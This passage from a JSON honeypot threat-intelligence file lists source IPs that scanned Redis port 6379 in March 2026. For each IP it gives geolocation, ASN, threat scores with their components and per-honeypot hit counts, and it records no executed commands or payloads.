      "honeypot_breakdown_30d": {
        "Suricata": 22,
        "Honeytrap": 12,
        "Redishoneypot": 3,
        "Dicompot": 1,
        "Dionaea": 1
      }
    },
    "171.116.47.209": {
      "attack_count": 13,
      "first_seen": "2026-03-31T06:11:25.000Z",
      "last_seen": "2026-03-31T06:12:28.903Z",
      "sessions": 0,
      "ports": [
        6379
      ],
      "commands_executed": [],
      "attack_types": [
        "scanning"
      ],
      "country": "China",
      "country_code": "CN",
      "city": null,
      "asn": 4837,
      "as_org": "CHINA UNICOM China169 Backbone",
      "threat_score": 21.9,
      "threat_level": "low",
      "score_components": {
        "frequency": 9.0,
        "persistence": 0.8,
        "diversity": 2,
        "spread": 10,
        "recency_factor": 1.0
      },
      "reputation_metrics": {
        "total_events_30d": 8,
        "days_active_30d": 1,
        "ports_targeted_30d": 1,
        "honeypots_triggered_30d": 2,
        "first_seen_30d": "2026-03-31T06:11:26+00:00",
        "last_seen_30d": "2026-03-31T06:12:28.903000+00:00",
        "days_since_last_seen": 0
      },
      "honeypot_breakdown_30d": {
        "Suricata": 5,
        "Redishoneypot": 3
      }
    },
    "91.196.152.33": {
      "attack_count": 13,
      "first_seen": "2026-03-02T10:59:13.000Z",
      "last_seen": "2026-03-02T11:00:28.003Z",
      "sessions": 0,
      "ports": [
        6379
      ],
      "commands_executed": [],
      "attack_types": [
        "scanning"
      ],
      "country": "France",
      "country_code": "FR",
      "city": "Roubaix",
      "asn": 213412,
      "as_org": "ONYPHE SAS",
      "threat_score": 80.6,
      "threat_level": "critical",
      "score_components": {
        "frequency": 20.6,
        "persistence": 25,
        "diversity": 20,
        "spread": 15,
        "recency_factor": 1.0
      },
      "reputation_metrics": {
        "total_events_30d": 115,
        "days_active_30d": 30,
        "ports_targeted_30d": 39,
        "honeypots_triggered_30d": 3,
        "first_seen_30d": "2026-03-02T10:59:13+00:00",
        "last_seen_30d": "2026-03-31T23:13:39.574000+00:00",
        "days_since_last_seen": 0
      },
      "honeypot_breakdown_30d": {
        "Suricata": 72,
        "Honeytrap": 40,
        "Redishoneypot": 3
      }
    },
    "151.242.30.226": {
      "attack_count": 12,
      "first_seen": "2026-03-21T06:05:37.000Z",
      "last_seen": "2026-03-29T02:01:58.724Z",
      "sessions": 0,
      "ports": [
        6379
      ],
      "commands_executed": [],
      "attack_types": [
        "scanning"
      ],
      "country": "United Arab Emirates",
      "country_code": "AE",
      "city": null,
      "asn": 214209,
      "as_org": "Internet Magnate (Pty) Ltd",
      "threat_score": 69.3,
      "threat_level": "high",
      "score_components": {
        "frequency": 18.5,
        "persistence": 20.8,
        "diversity": 20,
        "spread": 10,
        "recency_factor": 1.0
      },
      "reputation_metrics": {
        "total_events_30d": 71,
        "days_active_30d": 25,
        "ports_targeted_30d": 39,
        "honeypots_triggered_30d": 2,
        "first_seen_30d": "2026-03-07T18:56:46.291000+00:00",
        "last_seen_30d": "2026-03-31T23:48:18.044000+00:00",
        "days_since_last_seen": 0
      },
      "honeypot_breakdown_30d": {
        "Suricata": 69,
        "Honeytrap": 2
      }
    },
    "162.142.125.112": {
      "attack_count": 12,
      "first_seen": "2026-03-20T19:31:09.000Z",
      "last_seen": "2026-03-20T19:32:17.849Z",
      "sessions": 0,
      "ports": [
        6379
      ],
      "commands_executed": [],
      "attack_types": [
        "scanning"
      ],
      "country": "United States",
      "country_code": "US",
      "city": null,
      "asn": 398324,
      "as_org": "Censys, Inc.",
      "threat_score": 59.9,
      "threat_level": "medium",
      "score_components": {
        "frequency": 23.1,
        "persistence": 17.5,
        "diversity": 20,
        "spread": 25,
        "recency_factor": 0.7
      },
      "reputation_metrics": {
        "total_events_30d": 204,
        "days_active_30d": 21,
        "ports_targeted_30d": 43,
        "honeypots_triggered_30d": 9,
        "first_seen_30d": "2026-03-02T09:53:56.304000+00:00",
        "last_seen_30d": "2026-03-22T05:11:01.281000+00:00",
        "days_since_last_seen": 9
      },
      "honeypot_breakdown_30d": {
        "Suricata": 136,
        "Honeytrap": 37,
        "ElasticPot": 10,
        "Ciscoasa": 6,
        "Redishoneypot": 6,
        "H0neytr4p": 4,
        "ConPot": 2,
        "Honeyaml": 2,
        "Dionaea": 1
      }
    },
    "167.94.138.187": {
      "attack_count": 12,
      "first_seen": "2026-03-16T14:34:01.000Z",
      "last_seen": "2026-03-16T14:35:08.352Z",
      "sessions": 0,
      "ports": [
        6379
      ],
      "commands_executed": [],
      "attack_types": [
        "scanning"
      ],
      "country": "United States",
      "country_code": "US",
      "city": null,
      "asn": 398324,
      "as_org": "Censys, Inc.",
      "threat_score": 59.9,
      "threat_level": "medium",
      "score_components": {
        "frequency": 23.0,
        "persistence": 17.5,
        "diversity": 20,
        "spread": 25,
        "recency_factor": 0.7
      },
      "reputation_metrics": {
        "total_events_30d": 201,
        "days_active_30d": 21,
        "ports_targeted_30d": 58,
        "honeypots_triggered_30d": 11,
        "first_seen_30d": "2026-03-02T03:21:23+00:00",
        "last_seen_30d": "2026-03-22T14:03:19.260000+00:00",
        "days_since_last_seen": 9
      },
      "honeypot_breakdown_30d": {
        "Suricata": 112,
        "Honeytrap": 56,
        "Cowrie": 10,
        "Redishoneypot": 6,
        "ElasticPot": 4,
        "Tanner": 4,
        "Dionaea": 3,
        "Adbhoney": 2,
        "ConPot": 2,
        "Ipphoney": 1,
        "Sentrypeer": 1
      }
    },
    "167.94.138.33": {
      "attack_count": 12,
      "first_seen": "2026-03-23T19:30:38.000Z",
      "last_seen": "2026-03-23T19:31:39.472Z",
      "sessions": 0,
      "ports": [
        6379
      ],
      "commands_executed": [],
      "attack_types": [
        "scanning"
      ],
      "country": "United States",
      "country_code": "US",
      "city": null,
      "asn": 398324,
      "as_org": "Censys, Inc.",
      "threat_score": 61.3,
      "threat_level": "high",
      "score_components": {
        "frequency": 20.3,
        "persistence": 18.3,
        "diversity": 20,
        "spread": 25,
        "recency_factor": 0.73
      },
      "reputation_metrics": {
        "total_events_30d": 107,
        "days_active_30d": 22,
        "ports_targeted_30d": 31,
        "honeypots_triggered_30d": 6,
        "first_seen_30d": "2026-03-02T01:40:05.801000+00:00",
        "last_seen_30d": "2026-03-23T19:31:39.472000+00:00",
        "days_since_last_seen": 8
      },
      "honeypot_breakdown_30d": {
        "Suricata": 52,
        "Honeytrap": 38,
        "Miniprint": 6,
        "Redishoneypot": 6,
        "ElasticPot": 4,
        "Dionaea": 1
      }
    },
    "199.45.154.157": {
      "attack_count": 12,
      "first_seen": "2026-03-19T14:19:50.000Z",
      "last_seen": "2026-03-19T14:20:59.905Z",
      "sessions": 0,
      "ports": [
        6379
      ],
      "commands_executed": [],
      "attack_types": [
        "scanning"
      ],
      "country": "United States",
      "country_code": "US",
      "city": null,
      "asn": 398722,
      "as_org": "Censys, Inc.",
      "threat_score": 88.3,
      "threat_level": "critical",
      "score_components": {
        "frequency": 18.3,
        "persistence": 25,
        "diversity": 20,
        "spread": 25,
        "recency_factor": 1.0
      },
      "reputation_metrics": {
        "total_events_30d": 68,
        "days_active_30d": 30,
        "ports_targeted_30d": 13,
        "honeypots_triggered_30d": 5,
        "first_seen_30d": "2026-03-02T03:28:26+00:00",
        "last_seen_30d": "2026-03-31T05:12:14.593000+00:00",
        "days_since_last_seen": 0
      },
      "honeypot_breakdown_30d": {
        "Suricata": 38,
        "Honeytrap": 14,
        "Cowrie": 6,
        "Redishoneypot": 6,
        "H0neytr4p": 4
      }
    },
    "66.132.172.109": {
      "attack_count": 12,
      "first_seen": "2026-03-29T17:06:57.000Z",
      "last_seen": "2026-03-29T17:08:02.917Z",
      "sessions": 0,
      "ports": [
        6379
      ],
      "commands_executed": [],
      "attack_types": [
        "scanning"
      ],
      "country": "United States",
      "country_code": "US",
      "city": null,
      "asn": 398324,
      "as_org": "Censys, Inc.",
      "threat_score": 64.9,
      "threat_level": "high",
      "score_components": {
        "frequency": 19.6,
        "persistence": 7.5,
        "diversity": 20,
        "spread": 20,
        "recency_factor": 0.97
      },
      "reputation_metrics": {
        "total_events_30d": 91,
        "days_active_30d": 9,
        "ports_targeted_30d": 28,
        "honeypots_triggered_30d": 4,
        "first_seen_30d": "2026-03-22T16:42:19+00:00",
        "last_seen_30d": "2026-03-30T08:18:27.139000+00:00",
        "days_since_last_seen": 1
      },
      "honeypot_breakdown_30d": {
        "Suricata": 53,
        "Honeytrap": 30,
        "Redishoneypot": 6,
        "Dionaea": 2
      }
    },
    "117.44.49.181": {
      "attack_count": 11,
      "first_seen": "2026-03-17T19:01:14.000Z",
      "last_seen": "2026-03-17T19:02:21.025Z",
      "sessions": 0,
      "ports": [
        6379
      ],
      "commands_executed": [],
      "attack_types": [
        "scanning"
      ],
      "country": "China",
      "country_code": "CN",
      "city": null,
      "asn": 4134,
      "as_org": "Chinanet",
      "threat_score": 11.4,
      "threat_level": "minimal",
      "score_components": {
        "frequency": 8.5,
        "persistence": 0.8,
        "diversity": 2,
        "spread": 10,
        "recency_factor": 0.53
      },
      "reputation_metrics": {
        "total_events_30d": 7,
        "days_active_30d": 1,
        "ports_targeted_30d": 1,
        "honeypots_triggered_30d": 2,
        "first_seen_30d": "2026-03-17T19:01:14+00:00",
        "last_seen_30d": "2026-03-17T19:02:21.025000+00:00",
        "days_since_last_seen": 14
      },
      "honeypot_breakdown_30d": {
        "Redishoneypot": 6,
        "Suricata": 1
      }
    },
    "121.196.228.6": {
      "attack_count": 10,
      "first_seen": "2026-03-14T09:44:18.000Z",
      "last_seen": "2026-03-14T09:45:28.062Z",
      "sessions": 0,
      "ports": [
        6379
      ],
      "commands_executed": [],
      "attack_types": [
        "scanning"
      ],
      "country": "China",
      "country_code": "CN",
      "city": "Hangzhou",
      "asn": 37963,
      "as_org": "Hangzhou Alibaba Advertising Co.,Ltd.",
      "threat_score": 8.2,
      "threat_level": "minimal",
      "score_components": {
        "frequency": 6.0,
        "persistence": 0.8,
        "diversity": 2,
        "spread": 10,
        "recency_factor": 0.43
      },
      "reputation_metrics": {
        "total_events_30d": 4,
        "days_active_30d": 1,
        "ports_targeted_30d": 1,
        "honeypots_triggered_30d": 2,
        "first_seen_30d": "2026-03-14T09:44:18+00:00",
        "last_seen_30d": "2026-03-14T09:45:28.062000+00:00",
        "days_since_last_seen": 17
      },
      "honeypot_breakdown_30d": {
        "Redishoneypot": 3,
        "Suricata": 1
      }
    },
    "4.174.178.51": {
      "attack_count": 10,
      "first_seen": "2026-03-02T05:03:12.000Z",
      "last_seen": "2026-03-02T05:04:20.442Z",
      "sessions": 0,
      "ports": [
        6379
      ],
      "commands_executed": [],
      "attack_types": [
        "scanning"
      ],
      "country": "Canada",
      "country_code": "CA",
      "city": "Toronto",
      "asn": 8075,
      "as_org": "Microsoft Corporation",
      "threat_score": 1.9,
      "threat_level": "minimal",
      "score_components": {
        "frequency": 6.0,
        "persistence": 0.8,
        "diversity": 2,
        "spread": 10,
        "recency_factor": 0.1
      },
      "reputation_metrics": {
        "total_events_30d": 4,
        "days_active_30d": 1,
        "ports_targeted_30d": 1,
        "honeypots_triggered_30d": 2,
        "first_seen_30d": "2026-03-02T05:03:12+00:00",
        "last_seen_30d": "2026-03-02T05:04:20.442000+00:00",
        "days_since_last_seen": 29
      },
      "honeypot_breakdown_30d": {
        "Redishoneypot": 3,
        "Suricata": 1
      }
    },
    "45.7.144.144": {
      "attack_count": 10,
      "first_seen": "2026-03-17T01:41:49.000Z",
      "last_seen": "2026-03-17T07:06:35.831Z",
      "sessions": 0,
      "ports": [
        6379
      ],
      "commands_executed": [],
      "attack_types": [
        "scanning"
      ],
      "country": "Brazil",
      "country_code": "BR",
      "city": "Sobradinho",
      "asn": 266605,
      "as_org": "2B Tecnologias em Informatica LTDA",
      "threat_score": 5.8,
      "threat_level": "minimal",
      "score_components": {
        "frequency": 3.0,
        "persistence": 0.8,
        "diversity": 2,
        "spread": 5,
        "recency_factor": 0.53
      },
      "reputation_metrics": {
        "total_events_30d": 2,
        "days_active_30d": 1,
        "ports_targeted_30d": 1,
        "honeypots_triggered_30d": 1,
        "first_seen_30d": "2026-03-17T01:42:56.939000+00:00",
        "last_seen_30d": "2026-03-17T07:06:35.831000+00:00",
        "days_since_last_seen": 14
      },
      "honeypot_breakdown_30d": {
        "Suricata": 2
      }
    },
    "47.117.146.179": {
      "attack_count": 10,
      "first_seen": "2026-03-24T04:12:06.000Z",
      "last_seen": "2026-03-28T10:05:09.522Z",
      "sessions": 0,
      "ports": [
        6379
      ],
      "commands_executed": [],
      "attack_types": [
        "scanning"
      ],
      "country": "China",
      "country_code": "CN",
      "city": "Shanghai",
      "asn": 37963,
      "as_org": "Hangzhou Alibaba Advertising Co.,Ltd.",
      "threat_score": 12.8,
      "threat_level": "minimal",
      "score_components": {
        "frequency": 3.0,
        "persistence": 4.2,
        "diversity": 2,
        "spread": 5,
        "recency_factor": 0.9
      },
      "reputation_metrics": {
        "total_events_30d": 2,
        "days_active_30d": 5,
        "ports_targeted_30d": 1,
        "honeypots_triggered_30d": 1,
        "first_seen_30d": "2026-03-24T04:13:10.391000+00:00",
        "last_seen_30d": "2026-03-28T10:05:09.522000+00:00",
        "days_since_last_seen": 3
      },
      "honeypot_breakdown_30d": {
        "Suricata": 2
      }
    },
    "8.142.178.141": {
      "attack_count": 10,
      "first_seen": "2026-03-23T16:24:21.000Z",
      "last_seen": "2026-03-23T16:25:31.650Z",
      "sessions": 0,
      "ports": [
        6379
      ],
      "commands_executed": [],
      "attack_types": [
        "scanning"
      ],
      "country": "China",
      "country_code": "CN",
      "city": "Beijing",
      "asn": 37963,
      "as_org": "Hangzhou Alibaba Advertising Co.,Ltd.",
      "threat_score": 35.3,
      "threat_level": "low",
      "score_components": {
        "frequency": 13.8,
        "persistence": 13.3,
        "diversity": 6,
        "spread": 15,
        "recency_factor": 0.73
      },
      "reputation_metrics": {
        "total_events_30d": 24,
        "days_active_30d": 16,
        "ports_targeted_30d": 3,
        "honeypots_triggered_30d": 3,
        "first_seen_30d": "2026-03-08T03:16:55+00:00",
        "last_seen_30d": "2026-03-23T16:25:31.650000+00:00",
        "days_since_last_seen": 8
      },
      "honeypot_breakdown_30d": {
        "Suricata": 17,
        "Honeytrap": 4,
        "Redishoneypot": 3
      }
    },
    "116.153.32.50": {
      "attack_count": 9,
      "first_seen": "2026-03-30T11:13:47.000Z",
      "last_seen": "2026-03-30T11:14:57.789Z",
      "sessions": 0,
      "ports": [
        6379
      ],
      "commands_executed": [],
      "attack_types": [
        "scanning"
      ],
      "country": "China",
      "country_code": "CN",
      "city": null,
      "asn": 4837,
      "as_org": "CHINA UNICOM China169 Backbone",
      "threat_score": 18.2,
      "threat_level": "minimal",
      "score_components": {
        "frequency": 6.0,
        "persistence": 0.8,
        "diversity": 2,
        "spread": 10,
        "recency_factor": 0.97
      },
      "reputation_metrics": {
        "total_events_30d": 4,
        "days_active_30d": 1,
        "ports_targeted_30d": 1,
        "honeypots_triggered_30d": 2,
        "first_seen_30d": "2026-03-30T11:13:47+00:00",
        "last_seen_30d": "2026-03-30T11:14:57.789000+00:00",
        "days_since_last_seen": 1
      },
      "honeypot_breakdown_30d": {
        "Redishoneypot": 3,
        "Suricata": 1
      }
    },
    "13.58.114.74": {
      "attack_count": 9,
      "first_seen": "2026-03-05T20:46:20.000Z",
      "last_seen": "2026-03-05T20:47:22.808Z",
      "sessions": 0,
      "ports": [
        6379
      ],
      "commands_executed": [],
      "attack_types": [
        "scanning"
      ],
      "country": "United States",
      "country_code": "US",
      "city": null,
      "asn": 16509,
      "as_org": "Amazon.com, Inc.",
      "threat_score": 9.4,
      "threat_level": "minimal",
      "score_components": {
        "frequency": 24.7,
        "persistence": 0.8,
        "diversity": 20,
        "spread": 25,
        "recency_factor": 0.13
      },
      "reputation_metrics": {
        "total_events_30d": 292,
        "days_active_30d": 1,
        "ports_targeted_30d": 159,
        "honeypots_triggered_30d": 7,
        "first_seen_30d": "2026-03-05T20:46:19+00:00",
        "last_seen_30d": "2026-03-05T20:56:26.236000+00:00",
        "days_since_last_seen": 26
      },
      "honeypot_breakdown_30d": {
        "Suricata": 162,
        "Honeytrap": 110,
        "Dionaea": 9,
        "Cowrie": 4,
        "Miniprint": 3,
        "Adbhoney": 2,
        "Redishoneypot": 2
      }
    },
    "20.235.199.173": {
      "attack_count": 9,
      "first_seen": "2026-03-18T23:45:54.000Z",
      "last_seen": "2026-03-18T23:47:01.857Z",
      "sessions": 0,
      "ports": [
        6379
      ],
      "commands_executed": [],
      "attack_types": [
        "scanning"
      ],
      "country": "India",
      "country_code": "IN",
      "city": "Pune",
      "asn": 8075,
      "as_org": "Microsoft Corporation",
      "threat_score": 10.7,
      "threat_level": "minimal",
      "score_components": {
        "frequency": 6.0,
        "persistence": 0.8,
        "diversity": 2,
        "spread": 10,
        "recency_factor": 0.57
      },
      "reputation_metrics": {
        "total_events_30d": 4,
        "days_active_30d": 1,
        "ports_targeted_30d": 1,
        "honeypots_triggered_30d": 2,
        "first_seen_30d": "2026-03-18T23:45:54+00:00",
        "last_seen_30d": "2026-03-18T23:47:01.857000+00:00",
        "days_since_last_seen": 13
      },
      "honeypot_breakdown_30d": {
        "Redishoneypot": 3,
        "Suricata": 1
      }
    },
    "205.210.31.244": {
      "attack_count": 9,
      "first_seen": "2026-03-03T21:18:23.000Z",
      "last_seen": "2026-03-03T21:19:56.905Z",
      "sessions": 0,
      "ports": [
        6379
      ],
      "commands_executed": [],
      "attack_types": [
        "scanning"
      ],
      "country": "United States",
      "country_code": "US",
      "city": null,
      "asn": 396982,
      "as_org": "Google LLC",
      "threat_score": 89.8,
      "threat_level": "critical",
      "score_components": {
        "frequency": 19.8,
        "persistence": 25,
        "diversity": 20,
        "spread": 25,
        "recency_factor": 1.0
      },
      "reputation_metrics": {
        "total_events_30d": 96,
        "days_active_30d": 30,
        "ports_targeted_30d": 28,
        "honeypots_triggered_30d": 7,
        "first_seen_30d": "2026-03-02T15:31:35.936000+00:00",
        "last_seen_30d": "2026-03-31T22:44:38.659000+00:00",
        "days_since_last_seen": 0
      },
      "honeypot_breakdown_30d": {
        "Suricata": 64,
        "Honeytrap": 21,
        "Cowrie": 4,
        "Redishoneypot": 3,
        "ConPot": 2,
        "Dionaea": 1,
        "Honeyaml": 1
      }
    },
    "45.154.25.117": {
      "attack_count": 9,
      "first_seen": "2026-03-04T05:34:57.000Z",
      "last_seen": "2026-03-04T05:35:59.983Z",
      "sessions": 0,
      "ports": [
        6379
      ],
      "commands_executed": [],
      "attack_types": [
        "scanning"
      ],
      "country": "Thailand",
      "country_code": "TH",
      "city": "Nonthaburi",
      "asn": 56309,
      "as_org": "Siamdata Communication Co.,Ltd.",
      "threat_score": 1.9,
      "threat_level": "minimal",
      "score_components": {
        "frequency": 6.0,
        "persistence": 0.8,
        "diversity": 2,
        "spread": 10,
        "recency_factor": 0.1
      },
      "reputation_metrics": {
        "total_events_30d": 4,
        "days_active_30d": 1,
        "ports_targeted_30d": 1,
        "honeypots_triggered_30d": 2,
        "first_seen_30d": "2026-03-04T05:34:57+00:00",
        "last_seen_30d": "2026-03-04T05:35:59.983000+00:00",
        "days_since_last_seen": 27
      },
      "honeypot_breakdown_30d": {
        "Redishoneypot": 3,
        "Suricata": 1
      }
    },
    "52.189.221.141": {
      "attack_count": 9,
      "first_seen": "2026-03-03T04:54:17.000Z",
      "last_seen": "2026-03-03T04:55:18.517Z",
      "sessions": 0,
      "ports": [
        6379
      ],
      "commands_executed": [],
      "attack_types": [
        "scanning"
      ],
      "country": "Australia",
      "country_code": "AU",
      "city": "Melbourne",
      "asn": 8075,
      "as_org": "Microsoft Corporation",
      "threat_score": 1.9,
      "threat_level": "minimal",
      "score_components": {
        "frequency": 6.0,
        "persistence": 0.8,
        "diversity": 2,
        "spread": 10,
        "recency_factor": 0.1
      },
      "reputation_metrics": {
        "total_events_30d": 4,
        "days_active_30d": 1,
        "ports_targeted_30d": 1,
        "honeypots_triggered_30d": 2,
        "first_seen_30d": "2026-03-03T04:54:17+00:00",
        "last_seen_30d": "2026-03-03T04:55:18.517000+00:00",
        "days_since_last_seen": 28
      },
      "honeypot_breakdown_30d": {
        "Redishoneypot": 3,
        "Suricata": 1
      }
    },
    "8.140.150.7": {
      "attack_count": 9,
      "first_seen": "2026-03-04T02:56:58.000Z",
      "last_seen": "2026-03-04T02:58:03.588Z",
      "sessions": 0,
      "ports": [
        6379
      ],
      "commands_executed": [],
      "attack_types": [
        "scanning"
      ],
      "country": "China",
      "country_code": "CN",
      "city": "Beijing",
      "asn": 37963,
      "as_org": "Hangzhou Alibaba Advertising Co.,Ltd.",
      "threat_score": 1.9,
      "threat_level": "minimal",
      "score_components": {
        "frequency": 6.0,
        "persistence": 0.8,
        "diversity": 2,
        "spread": 10,
        "recency_factor": 0.1
      },
      "reputation_metrics": {
        "total_events_30d": 4,
        "days_active_30d": 1,
        "ports_targeted_30d": 1,
        "honeypots_triggered_30d": 2,
        "first_seen_30d": "2026-03-04T02:56:59+00:00",
        "last_seen_30d": "2026-03-04T02:58:03.588000+00:00",
        "days_since_last_seen": 27
      },
      "honeypot_breakdown_30d": {
        "Redishoneypot": 3,
        "Suricata": 1
      }
    },
    "3.137.148.99": {
      "attack_count": 8,
      "first_seen": "2026-03-15T16:09:45.000Z",
      "last_seen": "2026-03-15T16:10:53.951Z",
      "sessions": 0,
      "ports": [
        6379
      ],
      "commands_executed": [],
      "attack_types": [
        "scanning"
      ],
      "country": "United States",
      "country_code": "US",
      "city": "Columbus",
      "asn": 16509,
      "as_org": "Amazon.com, Inc.",
      "threat_score": 32.9,
      "threat_level": "low",
      "score_components": {
        "frequency": 24.7,
        "persistence": 0.8,
        "diversity": 20,
        "spread": 25,
        "recency_factor": 0.47
      },
      "reputation_metrics": {
        "total_events_30d": 292,
        "days_active_30d": 1,
        "ports_targeted_30d": 159,
        "honeypots_triggered_30d": 7,
        "first_seen_30d": "2026-03-15T16:09:45+00:00",
        "last_seen_30d": "2026-03-15T16:19:54.459000+00:00",
        "days_since_last_seen": 16
      },
      "honeypot_breakdown_30d": {
        "Suricata": 162,
        "Honeytrap": 110,
        "Dionaea": 9,
        "Cowrie": 4,
        "Miniprint": 3,
        "Adbhoney": 2,
        "Redishoneypot": 2
      }
    },
    "157.85.96.220": {
      "attack_count": 7,
      "first_seen": "2026-03-03T06:44:37.000Z",
      "last_seen": "2026-03-03T06:45:45.369Z",
      "sessions": 0,
      "ports": [
        6379
      ],
      "commands_executed": [],
      "attack_types": [
        "scanning"
      ],
      "country": "Thailand",
      "country_code": "TH",
      "city": null,
      "asn": 56309,
      "as_org": "Siamdata Communication Co.,Ltd.",
      "threat_score": 1.9,
      "threat_level": "minimal",
      "score_components": {
        "frequency": 6.0,
        "persistence": 0.8,
        "diversity": 2,
        "spread": 10,
        "recency_factor": 0.1
      },
      "reputation_metrics": {
        "total_events_30d": 4,
        "days_active_30d": 1,
        "ports_targeted_30d": 1,
        "honeypots_triggered_30d": 2,
        "first_seen_30d": "2026-03-03T06:44:37+00:00",
        "last_seen_30d": "2026-03-03T06:49:43.232000+00:00",
        "days_since_last_seen": 28
      },
      "honeypot_breakdown_30d": {
        "Redishoneypot": 2,
        "Suricata": 2
      }
    },
    "104.248.117.15": {
      "attack_count": 6,
      "first_seen": "2026-03-28T23:50:10.000Z",
      "last_seen": "2026-03-28T23:51:48.889Z",
      "sessions": 0,
      "ports": [
        6379
      ],
      "commands_executed": [],
      "attack_types": [
        "scanning"
      ],
      "country": "United States",
      "country_code": "US",
      "city": "North Bergen",
      "asn": 14061,
      "as_org": "DigitalOcean, LLC",
      "threat_score": 37.4,
      "threat_level": "low",
      "score_components": {
        "frequency": 13.4,
        "persistence": 1.7,
        "diversity": 20,
        "spread": 5,
        "recency_factor": 0.93
      },
      "reputation_metrics": {
        "total_events_30d": 22,
        "days_active_30d": 2,
        "ports_targeted_30d": 22,
        "honeypots_triggered_30d": 1,
        "first_seen_30d": "2026-03-28T16:26:49.999000+00:00",
        "last_seen_30d": "2026-03-29T11:44:40.367000+00:00",
        "days_since_last_seen": 2
      },
      "honeypot_breakdown_30d": {
        "Suricata": 22
      }
    },
    "175.27.135.2": {
      "attack_count": 6,
      "first_seen": "2026-03-05T12:48:57.000Z",
      "last_seen": "2026-03-05T12:50:07.177Z",
      "sessions": 0,
      "ports": [
        6379
      ],
      "commands_executed": [],
      "attack_types": [
        "scanning"
      ],
      "country": "China",
      "country_code": "CN",
      "city": "Nanjing",
      "asn": 45090,
      "as_org": "Shenzhen Tencent Computer Systems Company Limited",
      "threat_score": 1.0,
      "threat_level": "minimal",
      "score_components": {
        "frequency": 0.0,
        "persistence": 0.8,
        "diversity": 2,
        "spread": 5,
        "recency_factor": 0.13
      },
      "reputation_metrics": {
        "total_events_30d": 1,
        "days_active_30d": 1,
        "ports_targeted_30d": 1,
        "honeypots_triggered_30d": 1,
        "first_seen_30d": "2026-03-05T12:50:07.177000+00:00",
        "last_seen_30d": "2026-03-05T12:50:07.177000+00:00",
        "days_since_last_seen": 26
      },
      "honeypot_breakdown_30d": {
        "Suricata": 1
      }
    },
    "81.69.43.221": {
      "attack_count": 6,
      "first_seen": "2026-03-06T03:35:32.000Z",
      "last_seen": "2026-03-06T03:36:41.747Z",
      "sessions": 0,
      "ports": [
        6379
      ],
      "commands_executed": [],
      "attack_types": [
        "scanning"
      ],
      "country": "China",
      "country_code": "CN",
      "city": "Shanghai",
      "asn": 45090,
      "as_org": "Shenzhen Tencent Computer Systems Company Limited",
      "threat_score": 1.3,
      "threat_level": "minimal",
      "score_components": {
        "frequency": 0.0,
        "persistence": 0.8,
        "diversity": 2,
        "spread": 5,
        "recency_factor": 0.17
      },
      "reputation_metrics": {
        "total_events_30d": 1,
        "days_active_30d": 1,
        "ports_targeted_30d": 1,
        "honeypots_triggered_30d": 1,
        "first_seen_30d": "2026-03-06T03:36:41.747000+00:00",
        "last_seen_30d": "2026-03-06T03:36:41.747000+00:00",
        "days_since_last_seen": 25
      },
      "honeypot_breakdown_30d": {
        "Suricata": 1
      }
    },
    "100.29.192.72": {
      "attack_count": 5,
      "first_seen": "2026-03-14T18:00:25.000Z",
      "last_seen": "2026-03-14T18:02:03.659Z",
      "sessions": 0,
      "ports": [
        6379
      ],
      "commands_executed": [],
      "attack_types": [
        "scanning"
      ],
      "country": "United States",
      "country_code": "US",
      "city": "Ashburn",
      "asn": 14618,
      "as_org": "Amazon.com, Inc.",
      "threat_score": 41.1,
      "threat_level": "medium",
      "score_components": {
        "frequency": 8.5,
        "persistence": 20.0,
        "diversity": 14,
        "spread": 5,
        "recency_factor": 0.87
      },
      "reputation_metrics": {
        "total_events_30d": 7,
        "days_active_30d": 24,
        "ports_targeted_30d": 7,
        "honeypots_triggered_30d": 1,
        "first_seen_30d": "2026-03-04T04:58:46.499000+00:00",
        "last_seen_30d": "2026-03-27T12:21:07.378000+00:00",
        "days_since_last_seen": 4
      },
      "honeypot_breakdown_30d": {
        "Suricata": 7
      }
    },
    "102.203.200.156": {
      "attack_count": 5,
      "first_seen": "2026-03-10T02:45:12.000Z",
      "last_seen": "2026-03-10T02:46:14.110Z",
      "sessions": 0,
      "ports": [
        6379
      ],
      "commands_executed": [],
      "attack_types": [
        "scanning"
      ],
      "country": "Libya",
      "country_code": "LY",
      "city": null,
      "asn": 329263,
      "as_org": "Libyan-Spider-for-IT-LTD",
      "threat_score": 2.4,
      "threat_level": "minimal",
      "score_components": {
        "frequency": 0.0,
        "persistence": 0.8,
        "diversity": 2,
        "spread": 5,
        "recency_factor": 0.3
      },
      "reputation_metrics": {
        "total_events_30d": 1,
        "days_active_30d": 1,
        "ports_targeted_30d": 1,
        "honeypots_triggered_30d": 1,
        "first_seen_30d": "2026-03-10T02:46:14.110000+00:00",
        "last_seen_30d": "2026-03-10T02:46:14.110000+00:00",
        "days_since_last_seen": 21
      },
      "honeypot_breakdown_30d": {
        "Suricata": 1
      }
    },
    "138.197.44.169": {
      "attack_count": 5,
      "first_seen": "2026-03-14T23:29:07.000Z",
      "last_seen": "2026-03-14T23:30:17.520Z",
      "sessions": 0,
      "ports": [
        6379
      ],
      "commands_executed": [],
      "attack_types": [
        "scanning"
      ],
      "country": "United States",
      "country_code": "US",
      "city": "Clifton",
      "asn": 14061,
      "as_org": "DigitalOcean, LLC",
      "threat_score": 30.7,
      "threat_level": "low",
      "score_components": {
        "frequency": 30,
        "persistence": 0.8,
        "diversity": 20,
        "spread": 20,
        "recency_factor": 0.43
      },
      "reputation_metrics": {
        "total_events_30d": 1901,
        "days_active_30d": 1,
        "ports_targeted_30d": 1892,
        "honeypots_triggered_30d": 4,
        "first_seen_30d": "2026-03-14T19:45:57.239000+00:00",
        "last_seen_30d": "2026-03-14T23:35:24.145000+00:00",
        "days_since_last_seen": 17
      },
      "honeypot_breakdown_30d": {
        "Suricata": 1866,
        "Honeytrap": 31,
        "Miniprint": 3,
        "Sentrypeer": 1
      }
    },
    "142.93.57.68": {
      "attack_count": 5,
      "first_seen": "2026-03-11T07:23:32.000Z",
      "last_seen": "2026-03-11T07:25:11.074Z",
      "sessions": 0,
      "ports": [
        6379
      ],
      "commands_executed": [],
      "attack_types": [
        "scanning"
      ],
      "country": "United States",
      "country_code": "US",
      "city": "North Bergen",
      "asn": 14061,
      "as_org": "DigitalOcean, LLC",
      "threat_score": 10.6,
      "threat_level": "minimal",
      "score_components": {
        "frequency": 9.0,
        "persistence": 1.7,
        "diversity": 16,
        "spread": 5,
        "recency_factor": 0.33
      },
      "reputation_metrics": {
        "total_events_30d": 8,
        "days_active_30d": 2,
        "ports_targeted_30d": 8,
        "honeypots_triggered_30d": 1,
        "first_seen_30d": "2026-03-10T13:26:32.635000+00:00",
        "last_seen_30d": "2026-03-11T07:25:11.074000+00:00",
        "days_since_last_seen": 20
      },
